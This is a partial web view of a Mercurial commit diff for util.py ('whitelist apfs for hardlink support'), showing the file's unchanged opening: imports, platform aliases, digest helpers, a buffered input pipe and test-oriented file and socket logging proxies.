##// END OF EJS Templates
util: whitelist apfs for hardlink support...
Augie Fackler -
r37400:de9f9f88 default
parent child Browse files
Show More
@@ -1,3859 +1,3860
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 63 empty = pycompat.empty
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def _rapply(f, xs):
139 139 if xs is None:
140 140 # assume None means non-value of optional data
141 141 return xs
142 142 if isinstance(xs, (list, set, tuple)):
143 143 return type(xs)(_rapply(f, x) for x in xs)
144 144 if isinstance(xs, dict):
145 145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 146 return f(xs)
147 147
148 148 def rapply(f, xs):
149 149 """Apply function recursively to every item preserving the data structure
150 150
151 151 >>> def f(x):
152 152 ... return 'f(%s)' % x
153 153 >>> rapply(f, None) is None
154 154 True
155 155 >>> rapply(f, 'a')
156 156 'f(a)'
157 157 >>> rapply(f, {'a'}) == {'f(a)'}
158 158 True
159 159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 161
162 162 >>> xs = [object()]
163 163 >>> rapply(pycompat.identity, xs) is xs
164 164 True
165 165 """
166 166 if f is pycompat.identity:
167 167 # fast path mainly for py2
168 168 return xs
169 169 return _rapply(f, xs)
170 170
171 171 def bitsfrom(container):
172 172 bits = 0
173 173 for bit in container:
174 174 bits |= bit
175 175 return bits
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 194 r'mercurial')
195 195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 196 DeprecationWarning, r'mercurial')
197 197
198 198 def nouideprecwarn(msg, version, stacklevel=1):
199 199 """Issue an python native deprecation warning
200 200
201 201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 202 """
203 203 if _dowarn:
204 204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 205 " update your code.)") % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 207
208 208 DIGESTS = {
209 209 'md5': hashlib.md5,
210 210 'sha1': hashlib.sha1,
211 211 'sha512': hashlib.sha512,
212 212 }
213 213 # List of digest types from strongest to weakest
214 214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 215
216 216 for k in DIGESTS_BY_STRENGTH:
217 217 assert k in DIGESTS
218 218
219 219 class digester(object):
220 220 """helper to compute digests.
221 221
222 222 This helper can be used to compute one or more digests given their name.
223 223
224 224 >>> d = digester([b'md5', b'sha1'])
225 225 >>> d.update(b'foo')
226 226 >>> [k for k in sorted(d)]
227 227 ['md5', 'sha1']
228 228 >>> d[b'md5']
229 229 'acbd18db4cc2f85cedef654fccc4a4d8'
230 230 >>> d[b'sha1']
231 231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 232 >>> digester.preferred([b'md5', b'sha1'])
233 233 'sha1'
234 234 """
235 235
236 236 def __init__(self, digests, s=''):
237 237 self._hashes = {}
238 238 for k in digests:
239 239 if k not in DIGESTS:
240 240 raise error.Abort(_('unknown digest type: %s') % k)
241 241 self._hashes[k] = DIGESTS[k]()
242 242 if s:
243 243 self.update(s)
244 244
245 245 def update(self, data):
246 246 for h in self._hashes.values():
247 247 h.update(data)
248 248
249 249 def __getitem__(self, key):
250 250 if key not in DIGESTS:
251 251 raise error.Abort(_('unknown digest type: %s') % k)
252 252 return nodemod.hex(self._hashes[key].digest())
253 253
254 254 def __iter__(self):
255 255 return iter(self._hashes)
256 256
257 257 @staticmethod
258 258 def preferred(supported):
259 259 """returns the strongest digest type in both supported and DIGESTS."""
260 260
261 261 for k in DIGESTS_BY_STRENGTH:
262 262 if k in supported:
263 263 return k
264 264 return None
265 265
266 266 class digestchecker(object):
267 267 """file handle wrapper that additionally checks content against a given
268 268 size and digests.
269 269
270 270 d = digestchecker(fh, size, {'md5': '...'})
271 271
272 272 When multiple digests are given, all of them are validated.
273 273 """
274 274
275 275 def __init__(self, fh, size, digests):
276 276 self._fh = fh
277 277 self._size = size
278 278 self._got = 0
279 279 self._digests = dict(digests)
280 280 self._digester = digester(self._digests.keys())
281 281
282 282 def read(self, length=-1):
283 283 content = self._fh.read(length)
284 284 self._digester.update(content)
285 285 self._got += len(content)
286 286 return content
287 287
288 288 def validate(self):
289 289 if self._size != self._got:
290 290 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 291 (self._size, self._got))
292 292 for k, v in self._digests.items():
293 293 if v != self._digester[k]:
294 294 # i18n: first parameter is a digest name
295 295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 296 (k, v, self._digester[k]))
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301 def buffer(sliceable, offset=0, length=None):
302 302 if length is not None:
303 303 return memoryview(sliceable)[offset:offset + length]
304 304 return memoryview(sliceable)[offset:]
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class let us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322 def __new__(cls, fh):
323 323 # If we receive a fileobjectproxy, we need to use a variation of this
324 324 # class that notifies observers about activity.
325 325 if isinstance(fh, fileobjectproxy):
326 326 cls = observedbufferedinputpipe
327 327
328 328 return super(bufferedinputpipe, cls).__new__(cls)
329 329
330 330 def __init__(self, input):
331 331 self._input = input
332 332 self._buffer = []
333 333 self._eof = False
334 334 self._lenbuf = 0
335 335
336 336 @property
337 337 def hasbuffer(self):
338 338 """True is any data is currently buffered
339 339
340 340 This will be used externally a pre-step for polling IO. If there is
341 341 already data then no polling should be set in place."""
342 342 return bool(self._buffer)
343 343
344 344 @property
345 345 def closed(self):
346 346 return self._input.closed
347 347
348 348 def fileno(self):
349 349 return self._input.fileno()
350 350
351 351 def close(self):
352 352 return self._input.close()
353 353
354 354 def read(self, size):
355 355 while (not self._eof) and (self._lenbuf < size):
356 356 self._fillbuffer()
357 357 return self._frombuffer(size)
358 358
359 359 def readline(self, *args, **kwargs):
360 360 if 1 < len(self._buffer):
361 361 # this should not happen because both read and readline end with a
362 362 # _frombuffer call that collapse it.
363 363 self._buffer = [''.join(self._buffer)]
364 364 self._lenbuf = len(self._buffer[0])
365 365 lfi = -1
366 366 if self._buffer:
367 367 lfi = self._buffer[-1].find('\n')
368 368 while (not self._eof) and lfi < 0:
369 369 self._fillbuffer()
370 370 if self._buffer:
371 371 lfi = self._buffer[-1].find('\n')
372 372 size = lfi + 1
373 373 if lfi < 0: # end of file
374 374 size = self._lenbuf
375 375 elif 1 < len(self._buffer):
376 376 # we need to take previous chunks into account
377 377 size += self._lenbuf - len(self._buffer[-1])
378 378 return self._frombuffer(size)
379 379
380 380 def _frombuffer(self, size):
381 381 """return at most 'size' data from the buffer
382 382
383 383 The data are removed from the buffer."""
384 384 if size == 0 or not self._buffer:
385 385 return ''
386 386 buf = self._buffer[0]
387 387 if 1 < len(self._buffer):
388 388 buf = ''.join(self._buffer)
389 389
390 390 data = buf[:size]
391 391 buf = buf[len(data):]
392 392 if buf:
393 393 self._buffer = [buf]
394 394 self._lenbuf = len(buf)
395 395 else:
396 396 self._buffer = []
397 397 self._lenbuf = 0
398 398 return data
399 399
400 400 def _fillbuffer(self):
401 401 """read data to the buffer"""
402 402 data = os.read(self._input.fileno(), _chunksize)
403 403 if not data:
404 404 self._eof = True
405 405 else:
406 406 self._lenbuf += len(data)
407 407 self._buffer.append(data)
408 408
409 409 return data
410 410
411 411 def mmapread(fp):
412 412 try:
413 413 fd = getattr(fp, 'fileno', lambda: fp)()
414 414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 415 except ValueError:
416 416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 417 # if the file is empty, and if so, return an empty buffer.
418 418 if os.fstat(fd).st_size == 0:
419 419 return ''
420 420 raise
421 421
422 422 class fileobjectproxy(object):
423 423 """A proxy around file objects that tells a watcher when events occur.
424 424
425 425 This type is intended to only be used for testing purposes. Think hard
426 426 before using it in important code.
427 427 """
428 428 __slots__ = (
429 429 r'_orig',
430 430 r'_observer',
431 431 )
432 432
433 433 def __init__(self, fh, observer):
434 434 object.__setattr__(self, r'_orig', fh)
435 435 object.__setattr__(self, r'_observer', observer)
436 436
437 437 def __getattribute__(self, name):
438 438 ours = {
439 439 r'_observer',
440 440
441 441 # IOBase
442 442 r'close',
443 443 # closed if a property
444 444 r'fileno',
445 445 r'flush',
446 446 r'isatty',
447 447 r'readable',
448 448 r'readline',
449 449 r'readlines',
450 450 r'seek',
451 451 r'seekable',
452 452 r'tell',
453 453 r'truncate',
454 454 r'writable',
455 455 r'writelines',
456 456 # RawIOBase
457 457 r'read',
458 458 r'readall',
459 459 r'readinto',
460 460 r'write',
461 461 # BufferedIOBase
462 462 # raw is a property
463 463 r'detach',
464 464 # read defined above
465 465 r'read1',
466 466 # readinto defined above
467 467 # write defined above
468 468 }
469 469
470 470 # We only observe some methods.
471 471 if name in ours:
472 472 return object.__getattribute__(self, name)
473 473
474 474 return getattr(object.__getattribute__(self, r'_orig'), name)
475 475
476 476 def __nonzero__(self):
477 477 return bool(object.__getattribute__(self, r'_orig'))
478 478
479 479 __bool__ = __nonzero__
480 480
481 481 def __delattr__(self, name):
482 482 return delattr(object.__getattribute__(self, r'_orig'), name)
483 483
484 484 def __setattr__(self, name, value):
485 485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 486
487 487 def __iter__(self):
488 488 return object.__getattribute__(self, r'_orig').__iter__()
489 489
490 490 def _observedcall(self, name, *args, **kwargs):
491 491 # Call the original object.
492 492 orig = object.__getattribute__(self, r'_orig')
493 493 res = getattr(orig, name)(*args, **kwargs)
494 494
495 495 # Call a method on the observer of the same name with arguments
496 496 # so it can react, log, etc.
497 497 observer = object.__getattribute__(self, r'_observer')
498 498 fn = getattr(observer, name, None)
499 499 if fn:
500 500 fn(res, *args, **kwargs)
501 501
502 502 return res
503 503
504 504 def close(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'close', *args, **kwargs)
507 507
508 508 def fileno(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'fileno', *args, **kwargs)
511 511
512 512 def flush(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'flush', *args, **kwargs)
515 515
516 516 def isatty(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'isatty', *args, **kwargs)
519 519
520 520 def readable(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'readable', *args, **kwargs)
523 523
524 524 def readline(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'readline', *args, **kwargs)
527 527
528 528 def readlines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'readlines', *args, **kwargs)
531 531
532 532 def seek(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'seek', *args, **kwargs)
535 535
536 536 def seekable(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'seekable', *args, **kwargs)
539 539
540 540 def tell(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'tell', *args, **kwargs)
543 543
544 544 def truncate(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'truncate', *args, **kwargs)
547 547
548 548 def writable(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'writable', *args, **kwargs)
551 551
552 552 def writelines(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'writelines', *args, **kwargs)
555 555
556 556 def read(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read', *args, **kwargs)
559 559
560 560 def readall(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'readall', *args, **kwargs)
563 563
564 564 def readinto(self, *args, **kwargs):
565 565 return object.__getattribute__(self, r'_observedcall')(
566 566 r'readinto', *args, **kwargs)
567 567
568 568 def write(self, *args, **kwargs):
569 569 return object.__getattribute__(self, r'_observedcall')(
570 570 r'write', *args, **kwargs)
571 571
572 572 def detach(self, *args, **kwargs):
573 573 return object.__getattribute__(self, r'_observedcall')(
574 574 r'detach', *args, **kwargs)
575 575
576 576 def read1(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'read1', *args, **kwargs)
579 579
580 580 class observedbufferedinputpipe(bufferedinputpipe):
581 581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 582
583 583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 584 bypass ``fileobjectproxy``. Because of this, we need to make
585 585 ``bufferedinputpipe`` aware of these operations.
586 586
587 587 This variation of ``bufferedinputpipe`` can notify observers about
588 588 ``os.read()`` events. It also re-publishes other events, such as
589 589 ``read()`` and ``readline()``.
590 590 """
591 591 def _fillbuffer(self):
592 592 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 593
594 594 fn = getattr(self._input._observer, r'osread', None)
595 595 if fn:
596 596 fn(res, _chunksize)
597 597
598 598 return res
599 599
600 600 # We use different observer methods because the operation isn't
601 601 # performed on the actual file object but on us.
602 602 def read(self, size):
603 603 res = super(observedbufferedinputpipe, self).read(size)
604 604
605 605 fn = getattr(self._input._observer, r'bufferedread', None)
606 606 if fn:
607 607 fn(res, size)
608 608
609 609 return res
610 610
611 611 def readline(self, *args, **kwargs):
612 612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 613
614 614 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 615 if fn:
616 616 fn(res)
617 617
618 618 return res
619 619
620 620 PROXIED_SOCKET_METHODS = {
621 621 r'makefile',
622 622 r'recv',
623 623 r'recvfrom',
624 624 r'recvfrom_into',
625 625 r'recv_into',
626 626 r'send',
627 627 r'sendall',
628 628 r'sendto',
629 629 r'setblocking',
630 630 r'settimeout',
631 631 r'gettimeout',
632 632 r'setsockopt',
633 633 }
634 634
635 635 class socketproxy(object):
636 636 """A proxy around a socket that tells a watcher when events occur.
637 637
638 638 This is like ``fileobjectproxy`` except for sockets.
639 639
640 640 This type is intended to only be used for testing purposes. Think hard
641 641 before using it in important code.
642 642 """
643 643 __slots__ = (
644 644 r'_orig',
645 645 r'_observer',
646 646 )
647 647
648 648 def __init__(self, sock, observer):
649 649 object.__setattr__(self, r'_orig', sock)
650 650 object.__setattr__(self, r'_observer', observer)
651 651
652 652 def __getattribute__(self, name):
653 653 if name in PROXIED_SOCKET_METHODS:
654 654 return object.__getattribute__(self, name)
655 655
656 656 return getattr(object.__getattribute__(self, r'_orig'), name)
657 657
658 658 def __delattr__(self, name):
659 659 return delattr(object.__getattribute__(self, r'_orig'), name)
660 660
661 661 def __setattr__(self, name, value):
662 662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 663
664 664 def __nonzero__(self):
665 665 return bool(object.__getattribute__(self, r'_orig'))
666 666
667 667 __bool__ = __nonzero__
668 668
669 669 def _observedcall(self, name, *args, **kwargs):
670 670 # Call the original object.
671 671 orig = object.__getattribute__(self, r'_orig')
672 672 res = getattr(orig, name)(*args, **kwargs)
673 673
674 674 # Call a method on the observer of the same name with arguments
675 675 # so it can react, log, etc.
676 676 observer = object.__getattribute__(self, r'_observer')
677 677 fn = getattr(observer, name, None)
678 678 if fn:
679 679 fn(res, *args, **kwargs)
680 680
681 681 return res
682 682
683 683 def makefile(self, *args, **kwargs):
684 684 res = object.__getattribute__(self, r'_observedcall')(
685 685 r'makefile', *args, **kwargs)
686 686
687 687 # The file object may be used for I/O. So we turn it into a
688 688 # proxy using our observer.
689 689 observer = object.__getattribute__(self, r'_observer')
690 690 return makeloggingfileobject(observer.fh, res, observer.name,
691 691 reads=observer.reads,
692 692 writes=observer.writes,
693 693 logdata=observer.logdata,
694 694 logdataapis=observer.logdataapis)
695 695
696 696 def recv(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'recv', *args, **kwargs)
699 699
700 700 def recvfrom(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'recvfrom', *args, **kwargs)
703 703
704 704 def recvfrom_into(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'recvfrom_into', *args, **kwargs)
707 707
708 708 def recv_into(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'recv_info', *args, **kwargs)
711 711
712 712 def send(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'send', *args, **kwargs)
715 715
716 716 def sendall(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'sendall', *args, **kwargs)
719 719
720 720 def sendto(self, *args, **kwargs):
721 721 return object.__getattribute__(self, r'_observedcall')(
722 722 r'sendto', *args, **kwargs)
723 723
724 724 def setblocking(self, *args, **kwargs):
725 725 return object.__getattribute__(self, r'_observedcall')(
726 726 r'setblocking', *args, **kwargs)
727 727
728 728 def settimeout(self, *args, **kwargs):
729 729 return object.__getattribute__(self, r'_observedcall')(
730 730 r'settimeout', *args, **kwargs)
731 731
732 732 def gettimeout(self, *args, **kwargs):
733 733 return object.__getattribute__(self, r'_observedcall')(
734 734 r'gettimeout', *args, **kwargs)
735 735
736 736 def setsockopt(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'setsockopt', *args, **kwargs)
739 739
740 740 class baseproxyobserver(object):
741 741 def _writedata(self, data):
742 742 if not self.logdata:
743 743 if self.logdataapis:
744 744 self.fh.write('\n')
745 745 self.fh.flush()
746 746 return
747 747
748 748 # Simple case writes all data on a single line.
749 749 if b'\n' not in data:
750 750 if self.logdataapis:
751 751 self.fh.write(': %s\n' % stringutil.escapestr(data))
752 752 else:
753 753 self.fh.write('%s> %s\n'
754 754 % (self.name, stringutil.escapestr(data)))
755 755 self.fh.flush()
756 756 return
757 757
758 758 # Data with newlines is written to multiple lines.
759 759 if self.logdataapis:
760 760 self.fh.write(':\n')
761 761
762 762 lines = data.splitlines(True)
763 763 for line in lines:
764 764 self.fh.write('%s> %s\n'
765 765 % (self.name, stringutil.escapestr(line)))
766 766 self.fh.flush()
767 767
768 768 class fileobjectobserver(baseproxyobserver):
769 769 """Logs file object activity."""
770 770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 771 logdataapis=True):
772 772 self.fh = fh
773 773 self.name = name
774 774 self.logdata = logdata
775 775 self.logdataapis = logdataapis
776 776 self.reads = reads
777 777 self.writes = writes
778 778
779 779 def read(self, res, size=-1):
780 780 if not self.reads:
781 781 return
782 782 # Python 3 can return None from reads at EOF instead of empty strings.
783 783 if res is None:
784 784 res = ''
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788 788
789 789 self._writedata(res)
790 790
791 791 def readline(self, res, limit=-1):
792 792 if not self.reads:
793 793 return
794 794
795 795 if self.logdataapis:
796 796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797 797
798 798 self._writedata(res)
799 799
800 800 def readinto(self, res, dest):
801 801 if not self.reads:
802 802 return
803 803
804 804 if self.logdataapis:
805 805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 806 res))
807 807
808 808 data = dest[0:res] if res is not None else b''
809 809 self._writedata(data)
810 810
811 811 def write(self, res, data):
812 812 if not self.writes:
813 813 return
814 814
815 815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 816 # returns the integer bytes written.
817 817 if res is None and data:
818 818 res = len(data)
819 819
820 820 if self.logdataapis:
821 821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822 822
823 823 self._writedata(data)
824 824
825 825 def flush(self, res):
826 826 if not self.writes:
827 827 return
828 828
829 829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830 830
831 831 # For observedbufferedinputpipe.
832 832 def bufferedread(self, res, size):
833 833 if not self.reads:
834 834 return
835 835
836 836 if self.logdataapis:
837 837 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 838 self.name, size, len(res)))
839 839
840 840 self._writedata(res)
841 841
842 842 def bufferedreadline(self, res):
843 843 if not self.reads:
844 844 return
845 845
846 846 if self.logdataapis:
847 847 self.fh.write('%s> bufferedreadline() -> %d' % (
848 848 self.name, len(res)))
849 849
850 850 self._writedata(res)
851 851
852 852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 853 logdata=False, logdataapis=True):
854 854 """Turn a file object into a logging file object."""
855 855
856 856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 857 logdata=logdata, logdataapis=logdataapis)
858 858 return fileobjectproxy(fh, observer)
859 859
860 860 class socketobserver(baseproxyobserver):
861 861 """Logs socket activity."""
862 862 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 863 logdata=False, logdataapis=True):
864 864 self.fh = fh
865 865 self.name = name
866 866 self.reads = reads
867 867 self.writes = writes
868 868 self.states = states
869 869 self.logdata = logdata
870 870 self.logdataapis = logdataapis
871 871
872 872 def makefile(self, res, mode=None, bufsize=None):
873 873 if not self.states:
874 874 return
875 875
876 876 self.fh.write('%s> makefile(%r, %r)\n' % (
877 877 self.name, mode, bufsize))
878 878
879 879 def recv(self, res, size, flags=0):
880 880 if not self.reads:
881 881 return
882 882
883 883 if self.logdataapis:
884 884 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 885 self.name, size, flags, len(res)))
886 886 self._writedata(res)
887 887
888 888 def recvfrom(self, res, size, flags=0):
889 889 if not self.reads:
890 890 return
891 891
892 892 if self.logdataapis:
893 893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 894 self.name, size, flags, len(res[0])))
895 895
896 896 self._writedata(res[0])
897 897
898 898 def recvfrom_into(self, res, buf, size, flags=0):
899 899 if not self.reads:
900 900 return
901 901
902 902 if self.logdataapis:
903 903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 904 self.name, size, flags, res[0]))
905 905
906 906 self._writedata(buf[0:res[0]])
907 907
908 908 def recv_into(self, res, buf, size=0, flags=0):
909 909 if not self.reads:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 914 self.name, size, flags, res))
915 915
916 916 self._writedata(buf[0:res])
917 917
918 918 def send(self, res, data, flags=0):
919 919 if not self.writes:
920 920 return
921 921
922 922 self.fh.write('%s> send(%d, %d) -> %d' % (
923 923 self.name, len(data), flags, len(res)))
924 924 self._writedata(data)
925 925
926 926 def sendall(self, res, data, flags=0):
927 927 if not self.writes:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 # Returns None on success. So don't bother reporting return value.
932 932 self.fh.write('%s> sendall(%d, %d)' % (
933 933 self.name, len(data), flags))
934 934
935 935 self._writedata(data)
936 936
937 937 def sendto(self, res, data, flagsoraddress, address=None):
938 938 if not self.writes:
939 939 return
940 940
941 941 if address:
942 942 flags = flagsoraddress
943 943 else:
944 944 flags = 0
945 945
946 946 if self.logdataapis:
947 947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 948 self.name, len(data), flags, address, res))
949 949
950 950 self._writedata(data)
951 951
952 952 def setblocking(self, res, flag):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957 957
958 958 def settimeout(self, res, value):
959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963 963
964 964 def gettimeout(self, res):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969 969
970 970 def setsockopt(self, level, optname, value):
971 971 if not self.states:
972 972 return
973 973
974 974 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 975 self.name, level, optname, value))
976 976
977 977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 978 logdata=False, logdataapis=True):
979 979 """Turn a socket into a logging socket."""
980 980
981 981 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 982 states=states, logdata=logdata,
983 983 logdataapis=logdataapis)
984 984 return socketproxy(fh, observer)
985 985
986 986 def version():
987 987 """Return version information if available."""
988 988 try:
989 989 from . import __version__
990 990 return __version__.version
991 991 except ImportError:
992 992 return 'unknown'
993 993
994 994 def versiontuple(v=None, n=4):
995 995 """Parses a Mercurial version string into an N-tuple.
996 996
997 997 The version string to be parsed is specified with the ``v`` argument.
998 998 If it isn't defined, the current Mercurial version string will be parsed.
999 999
1000 1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 1001 returned values:
1002 1002
